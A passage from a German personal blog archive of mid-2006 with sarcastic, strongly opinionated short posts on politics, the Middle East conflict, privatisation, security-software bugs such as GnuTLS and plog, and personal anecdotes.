Die Amis sollen gedroht haben, sie "in die Steinzeit zu versetzen".
Update: Bushs Verteidigung? Davon wisse er nichts. Nee, klar. Seine Regierung macht sowas ohne sein Wissen. Wieviel Inkompetenz muss der Mann eigentlich zugeben, bevor er gekickt wird?

Tue Sep 19 2006

[l] Ach Scheiße, Alturo macht zu. Dort steht blog.fefe.de. Alturo hat mir immer wenig Ärger gemacht, und war auffallend günstig (29 Euro pro Monat). Jetzt muss ich mir einen neuen Rootserver-Provider suchen. Was nimmt man denn da? Die anderen Angebote haben alle deutlich bessere Hardware, aber kosten auch mindestens das Doppelte. Heise schreibt, Alturo wolle einen Wechsel zu 1&1 zu Sonderkonditionen anbieten — na mal gucken.

Sun Sep 17 2006

[l] Der Aufbau im Irak ist von den größten Pfeifen gemacht worden, alle handselektiert nach ihrer Loyalität zu Bush. Erfahrungen mit dem, was sie da tun sollten, waren offenbar weitgehend uninteressant. I'm shocked, I tell you. Shocked!1!! (Danke, Kris)

Thu Sep 14 2006

[l] Ich habe mich ja schon beim ersten Literarischen Codequartett über Gnutls lustig gemacht, aber das hier verdient doch Erwähnung: Das gnutls 1.4.3 Freshmeat Announcement:
This release fixes PKCS#1 verification to avoid a variant of Bleichenbacher's Crypto 06 rump session attack. It fixes PKCS#1 decryption to avoid Bleichenbacher's Crypto 98 attack. It fixes a crash in gnutls_x509_crt_sign2 if passed a NULL issuer_key.
Oha, jetzt doch schon, ein Angriff von 1998.

Wed Sep 13 2006

[l] Ich bin ja an sich verhalten Pro-EU, aber als ich gestern abend beim Zappen auf Phoenix die Sendung "Das Superkonto" leider nur partiell mitbekam, wurde mir ganz anders. Hat davon zufällig jemand einen Mitschnitt gemacht, den er mir zur Verfügung stellen könnte?

Sat Sep 2 2006

[l] Oh Mann, das mit der PR müssen die noch mal üben. Das Missile Defense Shield ist ja bisher eine Realsatire, da funktioniert gar nichts, so überhaupt gar nicht, und daher haben sie jetzt einen neuen Test gemacht, und nicht mal vorher gesagt, es ginge darum, die Testrakete abzuschießen, sondern das sei reine Datenerhebung. Jetzt hat das Abfangen wohl geklappt, und sofort erklären sie den Test zu einem Erfolg, bevor sie die Daten auch nur einmal angeguckt haben können. Ging wohl eigentlich doch darum, die Rakete abzufangen…
[l] Nee, klar. Nachdem zur WM nichts passiert ist, sahen sich wohl einige Leute in Erklärungsnot, wieso wir Deutschland zu einem Überwachungs- und Polizeistaat gemacht haben, wenn dann nichts passiert. Bei der Verhörung der Bahn-"Terroristen" soll rausgekommen sein, daß sie die Anschläge angeblich schon zur WM geplant hatten.

Wed Aug 30 2006

[l] Update von unserem Senior Mexican Voting Analyst, Andreas: stellt sich raus, daß die EU-Wahlbeobachter nur geguckt haben, ob die Presse Zugang zu den Kandidaten hatte, die haben nicht mal versucht, Vote Stuffing zu finden, statistische Anomalien zu checken, oder auch nur Beschwerden nachzugehen. Ihre Beschwerde ist, daß die Wahllokale nicht pünktlich um 8 aufgemacht haben (WTF?! Das ist Mexiko, Mann!). Immerhin ist ihnen aufgefallen, daß da Siegel an den Kästen mit den Stimmen fehlten. Das ist ja ein klares Indiz dafür, daß die Wahl fair und ohne Manipulationen stattfand!1!! Unfaßbar.
[l] Erinnert ihr euch an Thames Water, die britischen Wasserwerke, über die Frank und ich uns im Fnord-Rückblick vor zwei Jahren lustig gemacht haben, weil sie so kraß viel Wasser verplempern? Die gehören RWE, die die vor sechs Jahren für 4,7 Milliarden Pfund gekauft hat, und RWE hat selbstverständlich überhaupt gar nichts in die Infrastruktur investiert, denn was schert so ein paar Schlipse in Deutschland schon, ob in England Wasser verschwendet wird!1!!
Warum erwähne ich das? RWE will Thames Water wieder abstoßen, ohne irgendwas repariert zu haben an den Rohren. Stattdessen wollen sie bis 2010 ein Viertel (!) der Belegschaft rausschmeißen oder rausekeln. Und der erwartete Verkaufspreis soll dann bei 6,5 Milliarden Pfund liegen. So macht man heute Geschäfte, verehrte Leser. Man kauft ein Monopol, scheißt einmal kräftig auf die Kundschaft, entläßt irgendwelche Mitarbeiter (als ob die was dafür könnten, daß RWE kein Geld in die Infrastruktur investiert hat!), und dann verkauft man die rauchenden Ruinen an irgend einen anderen Heuschreckeninvestor. RWE ist echt eine Schande für unser Land. Die ganze Sache wird ja gleich nochmal so ärgerlich, wenn man bedenkt, daß das alles von der Privatisierung von kritischer Infrastruktur kommt, und daß unsere Dumpfbacken-Politiker das ja auch tun, als sei das eine Lösung für irgendwas. Zum Kotzen. Wäre nur gerecht, wenn die Briten sich jetzt revangieren, und mal so richtig in Berlin das Wasser abdrehen würden. Und wißt ihr was, sie könnten es tun. Denn auch die Berliner Wasserwerke sind privatisiert worden — mit den zu erwartenden Folgen: die Investitionen in die Infrastruktur haben sich geviertelt, die Gewinne sind explodiert, aber die Preise sind gestiegen.

Sat Aug 26 2006

[l] Ehemalige SPD-Abgeordnete muss jetzt selbständig als Putzfrau arbeiten; sie hatte Hartz IV mitentschieden und sieht jetzt am eigenen Leib, was sie da angerichtet hat.
Nicht nur Friedrichs Ansichten über die angeblichen Chancen bei der Arbeitssuche haben sich seit ihrem Ausscheiden aus dem Bundestag verändert. Auch über einige ihrer früheren politischen Entscheidungen zum Thema Arbeitslosigkeit denkt die 57-Jährige heute anders: "Ich habe Hartz IV mitentschieden. Aber wir müssen viel genauer hinsehen, wen es trifft und wie. Denn es ist ja keine Arbeit da, in die man die Leute bringen könnte."
Mit Blick auf ihre ehemaligen Parlaments-Kollegen sagt sie: "Es würde so manchem gut tun, die Erfahrungen zu machen, die ich gemacht habe. Was ich im letzten Jahr erlebt habe, können sieben Jahre im Bundestag nicht wettmachen."
OH JA. Das wünsche ich auch einmal der kompletten SPD-Fraktion. Und der CDU-Fraktion. Und den Grünen auch. Die FDP kann die Gelegenheit nutzen, mal so richtig vollständig zu verkacken.

Fri Aug 25 2006

[l] Neue Version der Terrorgraphik, diesmal mit anständiger X-Achsen-Beschriftung. Dank an die drei Gnuplot-Spezialisten, die mir helfende Mails geschickt hatten! Da wacht man auf, will sich dem Problem zuwenden, und stellt fest, daß einem die Leute schon die Lösung gemailt haben :-)

Thu Aug 24 2006

[l] Ich habe im November 2005 mal angefangen, gezielt Artikel von Nachrichtenquellen im Internet zu ziehen, um dann später interessante Analysen damit machen zu können. Die Quellen sind u.a. tagesschau.de, spiegel.de, ZDF Heute, die Tickermeldungen von DPA, AP und Reuters, aber auch die BBC, die New York Times, der Guardian.
Heute habe ich mal meine erste Analyse gemacht. Ich habe alle Artikel nach Terrorwörtern durchsucht (also genau genommen nach den Substrings "gefahr", "gefähr", "bedroh", "anschlag", "anschläg", "terror"), und dann mal pro Kalendertag die Anzahl der Terrorwörter pro Artikel geplottet.
Ladies and Gentlemen, ich präsentiere: Das Internet-Terrormeter! Die X-Achse sind die Tage seit November 2005, da muss ich mal in Ruhe mit gnuplot verhandeln, um da Datumsangaben hinzukriegen :-) Ich persönlich bin schockiert, daß an manchen Tagen tatsächlich mehr Terrorwörter als Artikel vorkommen.

Tue Aug 22 2006

[l] Ich gucke gerade eine interessante Dokumentation über Kuba, "Cuba - the accidental revolution", von der Reihe "The Nature of Things" von der CBC (Kanada).
Nach dem Zusammenbruch des Ostblocks ist Kuba die Industrie zusammengebrochen, insbesondere die Agrarindustrie, weil sie ihr Öl und ihre Maschinen immer subventioniert von den Russen gekriegt haben. Sie haben ihren Zucker und ihre Milch und den Rest ihrer Landwirtschaft genau so gemacht, wie wir es immer noch machen, indem sie 12 Kalorien an Öl und Ölprodukten pro Kalorie in Essen ausgeben. Dann hatten sie kein Öl mehr, und so haben sie ihre Landwirtschaft umgestellt, und heute haben sie das Verhältnis umgekehrt.
Der Staat verleiht Land kostenlos an Farmer, solange die dort Nahrung anbauen.
Das Bildungsniveau ist auf Kuba offenbar sehr hoch, höher als in Lateinamerika. Das US-Handelsembargo hat dafür gesorgt, daß die Kubaner keinen Zugang zu westlichen Medikamenten haben, also haben sie eine starke Biomedizin aufgebaut. Ihren Dünger stellen die Kubaner mit Regenwürmern her, und ihr Ungeziefer werden sie auch natürlich los - die haben da für die häufigen Schadinsekten die natürlichen Feinde gelagert und lassen die dann bei Bedarf los, und werden Pilzbefall über Extrakte aus Zwiebeln und Knoblauch los. Sie planzen dann auch zwischen den Nutzpflanzen andere Pflanzen an, die bestimmte Insekten abstoßen oder anziehen, und haben keine Monokultur.
Die Preise sind auf den Märkten völlig frei bestimmt, von Angebot und Nachfrage. Von Kommunismus keine Rede. Die Agrarbetriebe sind zwar Kommunen in dem Sinne, daß sie den Mitarbeitern gehören, aber eben nicht staatlich kontrolliert. Die Arbeiter kriegen einen Anteil am Absatz, wer mehr arbeitet, verdient auch mehr. Und so können Bauern doppelt so viel verdienen wir Ärzte in Havanna. Faszinierender Stoff. Vielleicht sollte man sich damit mal näher beschäftigen.
Es ist zwar illegal, Teile des Hauses weiter zu vermieten, aber da Kuba zu wenig Häuser für die Bevölkerung hat, wird dieses Gesetz eben im Moment nicht durchgesetzt.
Wenn man das so alles sieht, sieht man, wieso die USA so eine Angst vor Kuba haben, insbesondere davor, daß das Modell Schule macht, und die Länder merken, daß "Freihandel" mit den USA keine Vorteile bringt.

Mon Aug 21 2006

[l] Na DAS ist ja wohl der Todesstoß: Angela "Flip-Flop" Merkel sagt, Schröder habe sich mit der Agenda 2010 um Deutschland verdient gemacht. Da sieht man mal, wie furchtbar die Agenda 2010 ist, wenn SPD und CDU die gut finden, dann muss sie ja grauenvoll sein :-)
[l] Einer tut sich im Moment — neben Schäuble und Beckstein — ganz besonders hervor mit der Panikmache, ein gewisser August Hanning, "Staatssekretär im Bundesinnenministerium". Ich vermute, es wird nicht vielen aufgefallen sein, was der Mann vorher gemacht hat. Die Fahne im Hintergrund ist übrigens die Hisbollah-Fahne :-)

Fri Aug 18 2006

[l] Lustiger Schuß in den Fuß: Die Amis haben den Mexikanern offenbar im Rahmen irgendwelcher Übereinkünfte erlaubt, ohne Paß die Grenze zu überqueren. Jetzt hat Bush ein Gesetz gemacht, daß "aus dem Urlaub zurück kommende Amerikaner" an der Grenze ihren Paß vorzeigen müssen. Natürlich geht es dabei nicht um die US-Bürger oder die Kanadier. Vermutlich ist es leichter, einen Führerschein aus Mexiko vorzuzeigen, als einen gültigen Paß. Jedenfalls heult jetzt die Reiseindustrie rum, weil sich an den Grenzen lange Schlangen gebildet haben, und die Beamten da bei den Prüfungen nur sehr oberflächlich gucken, um überhaupt fertig zu werden.

Wed Aug 16 2006

[l] Mann versucht, gestohlene Kreditkartendaten dem BKA zu melden, aber es war Freitag, und da arbeitet beim BKA keiner mehr. Ich kann das bestätigen, genau so ist mir das mit dem BKA auch gegangen, als ich mal mit denen zu tun hatte, weil ein Kunde geDoSt wurde. Der Laden ist echt eine Schande und sollte umgehend zugemacht werden. Die verplempern da echt unsere Steuergelder für Selbstverwaltung und den Aufbau von irgendwelchen Datenbanken, aber für tatsächliches Handeln fehlt dann das Personal.

Tue Aug 15 2006

[l] Wegen anhaltend schlechtem Wetter haben wir den Ostseeurlaub vorzeitig beendet. Ein bißchen mag auch eine Rolle gespielt haben, daß man in Norddeutschland von den Verkehrsschildern verarscht wird. Ich habe hier mal ein paar besonders auffallende Beispiele aufgenommen:
1. Durchfahrt Verboten in der Mitte (und nur in der Mitte) an einem Brückenpfeiler, aber sowohl rechts als auch links sieht man in der Gasse dann Autos in die entsprechende Richtung parken. Während ich da noch stand und überlegte, überholte mich einer und nahm die rechte Möglichkeit. Habe ich dann auch gemacht.
2. Der Weg nach Berlin hängt von unklaren Faktoren ab.
3. Sexismus am Strand: nur Frauen dürfen nicht springen
4. Noch ein bizarres "Durchfahrt Verboten". Hinter diesem Schild ist das Innenstadtparkhaus Lübecks. Anders ist das nicht zu erreichen. Und dann steht man plötzlich vor diesem Schild, das einem sagt, die Durchfahrt dahin ist verboten, aber in 150m ist ein Parkhaus. Hat mich etwas irritiert, ich kannte die Anhängsel-Darunter-Schilder nur als Einschränkung, für wen das gilt (bzw nicht gilt, wenn da "frei" steht)
Oh, und dieser Raucherlachs hier hat mich auch amüsiert. Ansonsten kann ich das Miniatur Wunderland in Hamburg nur wärmstens empfehlen. Der Weg dahin ist lang und steinig (wir sind beim Weg nach Hamburg rein gut 40 Minuten von Schildern fehlgelenkt worden, und auf dem Weg raus noch mal 30 Minuten; nehmt lieber Bahn und Taxi und nicht Auto). Im Gegensatz zu anderen auch auf Kinder ausgerichtete Veranstaltungen hatte ich das wohltuende Gefühl, nicht abgezockt zu werden. Während wir in der Warteschlange am Eingang standen, gab es Crepes für billig und Getränke für kostenlos, die Parkgebühren direkt vor der Tür gingen auch, der Eintrittspreis war fair, und es wird einem wirklich was geboten.

Tue Aug 8 2006

[l] Gruseliges Interview über unser Gesundheitssystem (leider nur RealAudio, kein Transkript). In Deutschland ist das Bundesinstitut für Arzneimittel und Medizinprodukte für die Zulassung von Medikamenten zuständig. Googelt mal danach. Die Pharmaindustrie heult rum, daß die "nur" 3000 Medikamente pro Jahr zulassen, und daß ihnen dadurch Kohle entgeht, und daß das alles so langsam ist, und — haltet euch fest — daß das Institut nicht kostendeckend arbeitet! Diese Forderung finde ich ja an Absurdität nicht zu überbieten. Äh, es geht da um Menschenleben, das ist die IDEE dabei, daß wir da als Volk Geld für ausgeben. Genau wie bei der Polizei, die arbeitet auch nicht kostendeckend (ohne jetzt jemanden auf dumme Ideen bringen zu wollen). Das Institut wird jetzt jedenfalls zu einer "Agentur" gemacht (hat ja schon beim Arbeitsamt prima funktioniert), und das heißt eben auch, daß die jetzt privatwirtschaftlich arbeiten und auf Profitmaximierung aus sind.
Laßt euch das mal auf der Zunge zergehen: die Behörde, die Pharmafirmen daran hindern soll, gefährliche (oder unwirksame) Medikamente auf den Markt zu pumpen, wird in Zukunft … von den Pharmafirmen finanziert! WTF?! Alle an die Wand stellen nach der Revolution, echt mal.
[l] Krasses Video aus dem Libanon. Sie zeigen die Hilfe-Infrastruktur im Libanon, wie die Flüchtlinge da versorgt werden. Sie zeigen riesige Küchen, die 75% der Flüchtlinge versorgen, zehntausende, und die Küchen werden von der Hisbollah betrieben.
Ich habe ja hier geschrieben, daß die internationalen Hilfsorganisationen von den Israelis plattgemacht werden. Das treibt die Leute in die Arme der Hisbollah, weil niemand sonst da jetzt Hilfe leisten kann. Und man kann ja viel sagen über die Israelis, aber die sind ja nicht blind und doof, die werden das auch wissen. Was da wohl die Idee dahinter ist? Daß sie danach sagen können, die ganze Bevölkerung seien Hisbollah-Jünger, weil sie sich von denen haben helfen lassen?

Sat Aug 5 2006

[l] Das haben sie bestimmt gemacht, weil da die Hisbollah saß!1!! Israel zerbombt vier Brücken der Straße, über die die Hilfslieferungen Richtung Beirut kommen. Nee, klar, der Kampf gegen die Terroristen. So langsam muss man ja echt von einer Mitschuld der Nachbarstaaten reden, daß die da den Libanesen nicht helfen. Syrien und Ägypten sind immer gerne dabei, wenn es um Rhetorik gegen Israel geht, und Israel erzählt immer einen vom Pferd, wie bedroht sie von Ägypten, Syrien und dem Iran sind, und wo sind die jetzt, die gruseligen Bedroher? Haben die Hosen voll. Iran wird genau nichts tun, bis sie ihre Atombombe fertig haben. Und dann werden sie erst rechts nichts mehr direkt tun, wenn man das Verhalten der USA und Russen im kalten Krieg als Vorlage nimmt.

Wed Aug 2 2006

[l] Oha, Kris bewirft mich mit einem Stöckchen. Ich mache ja sowas normalerweise nicht, aber machen wir mal eine Ausnahme.
Warum bloggst Du?
Es fing als Linksammlung für den jährlich auf dem CCC Congress stattfindenden Fnord Jahresrückblick an. Über Blogger habe ich mich ja jahrelang lustig gemacht, vor allem auch weil sie alle so schlechte PHP/Perl/Python/Java/Whatever Knödelsoftware einsetzen, und sich da lauter New Age Dinge wie Trackback, Kommentarfunktion und XMLRPC ausdenken, um dann prompt für die damit einhergehenden Probleme neue Lösungen brauchen — eine veritable Arbeitsplatzbeschafftungsmaschine! Und so war klar, daß ich eine eigene Blogsoftware brauchen würde, in C geschrieben, mit tinyldap als Backend, und sei es nur um zu zeigen, daß das geht. :-)
Seit wann bloggst Du?
Seit dem 31. März 2005. Die 1. Meldung war, daß malaysische Autodiebe den Finger mitgeklaut haben, um an der Biometrie vorbei zu kommen.
Selbstportrait
(etwas älteres Bild)
Warum lesen Deine Leser Dein Blog?
Gute Frage. Ich habe das mal rauszufinden versucht vor einer Weile, und da schrieben mir mehrere Leute, daß sie mein Blog als Nachrichtenquelle nutzen.
Welche war die letzte Suchanfrage, über die jemand auf Deine Seite kam?
blog bei google.de (kraß, wa?)
Welcher Deiner Blogeinträge bekam zu Unrecht zu wenig Aufmerksamkeit?
Mhh, könnte ich jetzt keine konkrete nennen.
Dein aktuelles Lieblingsblog?
Das des ehemaligen Nachrichtenmagazins aus Hamburg. Oh, nur Blogs ohne Werbeeinblendungen? Na gut, dann Holgi und Susanne.
Welches Blog hast Du zuletzt gelesen
Metafilter.
Wie viele Feeds hast Du gerade im Moment abonniert?
Keine. Ich lese Blogs im Webbrowser. RSS kostet mich mehr Zeit als es einzusparen versprochen hatte.
An welche vier Blogs wirfst Du das Stöckchen weiter und warum?
Ich bewerfe doch keine harmlosen Blogs mit Stöckern!1!! Nee, das propagiert sich schon von alleine weiter.

Tue Aug 1 2006

[l] Habe beim Rumclicken diese PDFs zum Software-Optimieren gefunden, und das sieht so aus, als habe sich da jemand fett Arbeit gemacht. Guckt mal rein, wenn euch das interessiert.

Thu Jul 27 2006

[l] Chinas Bauern haben sich mit ihrem genmanipulierten Baumwollanbau selbst in den Fuß geschossen. Sie sind zwar den Schädling los, gegen den sie die Manipulation gemacht haben, aber dafür haben sie jetzt um so mehr andere Schädlinge. (Danke, Timo)

Wed Jul 26 2006

[l] Kennt ihr Marcus Ranum? Der Mann ist seit Jahren in der Security-Branche tätig. Der hat so Sachen gemacht wie die DEC SEAL Firewall, das TIS Firewall Toolkit, Gauntlet, Network Flight Recorder, und arbeitet jetzt der CSO bei Tenable Security (den Kommerz-Nessus-Leuten). Man sollte denken, jemand mit solchen Credentials, der kennt sich aus. Richtig?
Marcus Ranum hat auf einer Konferenz sein Klartext-Paßwort übers Netz gehen lassen, und das ist von Bill Cheswick (dem Erfinder der Firewall) gesnifft worden, und er hat ihm das als Email geschickt :-) Gut, das ist eine alte Geschichte, wieso komme ich jetzt gerade auf den? Weil Ilja mich auf plog hinwies, eine Software, die Ranum als Source ins Netz stellt. Die Software ist von 2004, da war der Mann seit über 12 Jahren im Security-Geschäft und hat seinen Kram verkauft. Und jetzt gucken wir uns das mal an: der Mann guckt nicht, ob die IP Header Länge überhaupt ins Paket paßt, guckt nie auf caplen im Paket, guckt nicht, ob der UDP-Header überhaupt innerhalb des Paketes liegt, … eine Katastrophe. Ilja erzählt mir gerade, daß im TIS Toolkit so Bugs drin waren wie if (a=b) statt if (a==b)… kurz gesagt: OMFG! Finger weg! Der Name und die Anzahl der Projekte einer Person sagen gar nichts. Ihr müsst euch immer den Code anschauen, um zu einem Schluß zu kommen.
[l] Tja, da haben sie die Rechnung wohl ohne den Wirt gemacht: Die EU ist schockiert, daß die Chinesen das kaputte Patentsystem, das wir ihnen aufgeschwatzt haben, jetzt benutzen, um EU-Firmen mit Trivialpatenten aus dem Markt fern zu halten. :-) Hut ab, liebe Chinesen. Das habt ihr GUT gemacht. Leider sind unsere Politiker zu merkbefreit, um da irgendwelche Konsequenzen draus zu ziehen.
[l] OpenDarwin runtergefahren. Das war der "Open Source Arm" von OS X.
Over the past few years, OpenDarwin has become a mere hosting facility for Mac OS X related projects. The original notions of developing the Mac OS X and Darwin sources has not panned out. Availability of sources, interaction with Apple representatives, difficulty building and tracking sources, and a lack of interest from the community have all contributed to this. Administering a system to host other people's projects is not what the remaining OpenDarwin contributors had signed up for and have been doing this thankless task far longer than they expected. It is time for OpenDarwin to go dark.
Ob Apple denen Ärger gemacht hat, wenn jemand wie Ilja und ich laut lachend auf Code bei denen verlinkt hat? OS X is zwar ne Lachnummer, aber man kann da viel entspannter lachen, wenn man bei OpenDarwin auf den Source zugreifen kann. Schade.

Sun Jul 23 2006

[l] Also ich muss ja schon staunen, wie viel Arbeit sich die ICFP Leute gemacht haben. Leider muss man sich registrieren, um einen Code zu kriegen, mit dem man dann das eigentliche Codex-Image auspacken kann. Ich muss zwar gleich weg zu einem Barbecue, und habe bisher auch nur ne Stunde investiert, aber ich muss sagen, das wäre ein wirklich cooler Contest gewesen.
12:00:00 1/1/19100
Welcome to Universal Machine IX (UMIX).

This machine is a shared resource. Please do not log
in to multiple simultaneous UMIX servers. No game playing
is allowed.

Please log in (use guest for visitor access).
;login:
Hut ab!

Fri Jul 21 2006

[l] Ahmadinedschad hat jetzt auch der Merkel einen länglichen Brief geschrieben, wo er offenbar fragt, wie man das Palästina-Problem gemeinsam lösen könne. Ich hoffe ja, daß der Brief veröffentlich wird. Es paßt natürlich nicht in die Panikmache-Propaganda gegen Iran, wenn der Mann, den man als unkontrollierbaren Wahnsinnigen darstellt, dessen Atombombenbesitz die Welt gefährdet, wenn so jemand dann plötzlich ganze Sätze formulieren kann, und vielleicht am Ende noch Argumente bringt. Daher reagiert unsere staatstragende Presse, die ich zu meinem Ungemach auch noch mit GEZ-Gebühren finanzieren muss, völlig vorhersagbar und bezeichnet den Brief erst mal aus "wirr", offensichtlich ohne es selbst gelesen zu haben! Die Aussagen zum Inhalt zitieren Angaben aus Regierungskreisen, die gar nicht so negativ klingen.
Also in meiner persönlichen Einschätzung sieht eine ARD, die sich gar nicht erst mit dem Inhalt des Briefes beschäftigen will, sondern ihn ungelesen als "wirr" bezeichnet, noch deutlich schlechter aus als ein Präsident, der wirre Briefe verschickt. Und vergeßt nicht, daß Ahmadinedschad von seinem Volk gewählt wurde. Das ist mehr, als man von Bush sagen kann.
[l] In Beirut sieht das gerade aus wie bei 9/11. Israel hat da einfach mal einen Stadtteil ausradiert. Was würde Israel eigentlich sagen, wenn bei ihnen mal jemand sowas tun würde? Unglaublich. Wie kann dieses Volk, die doch nun mehr als alle anderen ein Gefühl haben für den Horror von solchen Aktionen, wie können diese Menschen mit sich leben, wenn sie ein Stadtviertel plattmachen? Ist das nicht noch viel schlimmer als wenn ein Selbstmordbomber einen Bus in die Luft jagt? Bevor ihr mir jetzt schreibt: ja, man darf da nicht die Leichen zählen, beide Seiten haben sich mit einer Schuld belastet, die sie vermutlich nie wieder abtragen können. Ich finde es entsetzlich, daß so etwas in einem zivilisierten, demokratischen Land passieren kann. Die Amis haben ja wenigstens noch die Ausrede, daß ihre Medien sie belügen. Gut, das ist in Israel auch der Fall, wenn man sich z.B. mal Schlagzeilen auf Haaretz anguckt, aber die Israelis sind da nahe genug dran! Wahrscheinlich will man als Bürger von so einem Regime belogen werden, um mit der Realität nicht umgehen zu müssen. Ich bin ja schockiert, da sowas zu lesen wie The air force's limited success and the continued rocket attacks against northern Israel have drawn the IDF into Lebanon, where it is confronted by a well-organized, well trained and highly motivated Hezbollah force. Die stellen das ernsthaft so dar, als könne man die Israelische Armee mit ein paar Hisbollah-Guerillas vergleichen! Das ist doch keine Armee, mit der man sich auf dem Schlachtfeld schlägt und einer gewinnt!
Und dann dieser Satz: "The losses on the other side are greater, even if they are not being released." Ich könnte kotzen.
Hier, andere klassische Kriegsberichterstattung: "2 soldiers killed in clash with Hezbollah in Lebanon Pilot dies in helicopter collision near Kiryat Shmona". Unsere Soldaten sind Menschen, da zählen wir die Toten, auf der Gegenseite hingegen ist das eine amorphe Masse, die anderen halt.
Und während die Welt auf den Libanon guckt, passiert im Gaza-Streifen der ganz normale Horror. Die Armee hat mit einem Panzer in ein Haus geschossen, wo ein "Hamas-Aktivist" wohnte. Sie haben dabei eine Mutter mit zwei vorpubertären Kindern ermordet, und noch jemanden, den sie nicht identifizieren konnten, weil von der Leiche nicht mehr genug übrig war. Die Truppen haben zwei Tage lang "Razzia" gemacht in dem Flüchtlingslager, und dabei sind mindestens 14 Menschen getötet worden, "most of them militants". Alleine diese Formulierung ist ja schon kaum zu fassen. Hier die Berichterstattung der Israelis:
After two days of battles in the Mughazi camp, Israeli forces left behind considerable destruction, leveling farmland, tearing up water pipes and knocking down electricity wires. Some people in the camp of 22,000 were trapped in their houses by embankments the Israelis built as tank emplacements, residents said. […]
Military officials told The Associated Press the army is adopting a new policy of attacking homes in civilian areas where weapons, such as the homemade rockets routinely fired into Israel, are hidden.
Ich finde das echt unglaublich, daß die USA da UNO-Resolutionen verhindern. Ist ja nicht so, als würde die UNO irgendwelche Maßnahmen androhen, die da was ändern könnten, selbst die auch nur vage kritisch formulierten Beschwerde-Mitteilungen der UNO werden jetzt schon von den Amis gevetot. Furchtbar, das alles. Wenn man sich diese Schilderungen durchliest, muss man im Grunde mal überlegen, ob das nicht Punkt c) der Definition von Völkermord erfüllt!

Thu Jul 13 2006

[l] Frontal 21 ist ja schon immer eine Lachnummer vor dem Herrn gewesen, aber jetzt haben sie sich vom de.alt.arnooo-Insassen und de.talk.bizarre-Regular Sven Türpe vorführen lassen: Der Mann hat sich in einen Anzug geworfen und den staunenden Journalisten gezeigt, was für ein tolles Skriptkiddie er ist und wie man unter Gentoo Bankkonten mit /dev/urandom und hexdump leerräumt (und dabei noch einen Useless Use of Cat Award (Google Cache) mitnimmt). Ich sage: Hut ab, Sven! Und nicht nur das, er hat auch gleich Leuten, die diesen Firlefanz als solchen erkannt haben, eine Freude gemacht, indem er sich als Experte von Fraunhofer ausgegeben hat! HAHAHA, Fraunhofer! HAHA! Wunderbar! Der Tag ist gerettet. Glaubt ihr alles nicht? Hier gibt es den Stream
Update: Ja, der arbeitet wirklich bei Fraunhofer. Mir fiel nur gestern kein Winkel ein, aus dem ich mich so über Fraunhofer und Frontal 21 lustig machen kann :-) Dabei ist es doch offensichtlich: Sven hat beide verarscht! (Danke, dasr)

Wed Jul 12 2006

[l] Ich lese gerade "Armed Madhouse", das neue Buch von Greg Palast, und ich muss euch sagen, das Buch ist schockierend gut. Es verdrängt gerade mein bisheriges Lieblingsbuch von Platz Eins, "Best Democracy Money Can Buy" (ebenfalls von Greg Palast). Das schockierende an dem Mann ist, daß er noch nie eine seiner Theorien zurück ziehen mußte, weil er Blödsinn verbreitet hat — was er schreibt hat Hand und Fuß. Nicht nur das, er schreibt nicht das Selbe wie alle anderen. Ich bin erst bei 30% des Buches, und da kommt eine Überraschung nach der nächsten.
Unter anderem hält er Peak Oil für Blödsinn, ja sogar für ein PSYOP der Ölindustrie, und er hat Details! Hubbert, der Erfinder der Peak-Theorie, hat initial vorausgesagt, es gäbe nur so viel Öl, wie wir bis jetzt verbraucht haben; die Peak-Sache kam später. Hubbert hat damals für Shell gearbeitet, und sollte der Welt erklären, wieso Öl mehr als 2 Dollar pro Barrel kosten sollte, was der damalige Preis war, und wo offensichtlich Potential für mehr Profit bestand. Das Originalpaper sagt, man solle von dem Öl wegkommen (an dem Shell damals nicht viel verdiente) und Atomenergie nutzen (Shell gründete gerade zu der Zeit ein fettes Uran-Abbau-Konsortium).
Palast glaubt auch nicht, daß die Euro-Ölbörse was mit dem Irakkrieg zu tun hatte, weil beide Bushes ja aktiv daran gearbeitet haben, den Dollar abzuwerten und niedrig zu halten.
Er beschreibt, daß es in der Bush-Junta zwei Clans von Think Tanks gibt, die Einfluß ausüben - die Neocons und Big Oil. Saddam mußte weg, weil sich beide einig waren, daß er weg müsse. Die Neocons wollten ihn weghaben, damit sie die staatliche Ölförderung im Irak verramschen können. Das hätte dazu geführt, daß jeder Käufer auf seiner Parzelle Profitmaximierung macht und so insgesamt viel mehr Öl gefördert wird als im Moment. So wollten die Neocons die OPEC kaputt machen. Big Oil wollte das Gegenteil — die Ölförderung soll in staatlichen Händen bleiben, und die sollen so wenig Öl wie möglich fördern (denn Knappheit treibt die Preise und damit die Profite der Ölkonzerne hoch). Saddam mußte weg, weil er da offenbar wöchentlich aus Jux am Ölhahn gedreht hat. Er hat mal ne Woche nichts gefördert, als Solidarität mit den Palästinensern oder so, und dann wieder volle Pulle (naja, bis zu seiner Quota, die nicht sonderlich noch war). Das hat den Ölmarkt weitgehend ins Chaos gestürzt, so daß die Preise am Ende wild hoch- und runter gingen. Das wollte Big Oil abschalten, und daher mußte Saddam da aus ihrer Sicht weg. Und eines ihrer Ziele war, einen OPEC-Sitz zu kriegen (haben sie jetzt über den Irak).
Es gibt da noch lustige Details, wie z.B. daß Gaddafi offenbar semiöffentlich darüber nachgedacht hat, mit Saddam zusammen die Ölförderung temporär einzustellen, um die USA zu ärgern, und als das das letzte Mal passierte, haben die Amis halt in Venezuela mehr Öl gekauft, aber da war gerade Chavez an die Macht gekommen, und der hätte da nicht mitgemacht, und daher haben seiner Ansicht nach die Amis übereilt den Chavez-Putsch losgetreten, bevor die Planung in trockenen Tüchern war, und deshalb ist das gescheitert.
Na was soll ich sagen, das ist ein hervorragendes Buch, sehr fesselnd und durchaus anregend für den Geist. Eine nette Zahl hat er noch gehabt: durch den Irakkrieg haben die Saudis 2005 das Dreifache ihres normalen Profites eingefahren mit Öl. Die können jetzt zwei Jahre lang die Pumpe zulassen (oder anders herum, volle Pulle fördern und ihr Öl verschenken, z.B. weil der Irak die Preise kaputt macht), ohne daß sie hungern müssten. Aber die Krönung ist das Kapitel, wo er darstellt, daß im Irak nie wirklich Öl gefördert wurde, die haben gerade ein Fünftel ihrer Ölfelder überhaupt angestochen, und es gab da sogar ein Kartell der Ölfirmen, die vereinbart haben, daß da niemand fördert (das war in der Zeit vom 1. Weltkrieg). Also, kauft euch mal alle das Buch, das ist augenöffnend! Wußtet ihr z.B., daß Bremer (der Zwischendurch-Irak-Verwalter) Managing Director von Kissinger Associates war (ja, der Kissinger, der Kriegsverbrecher)?

Thu Jul 6 2006

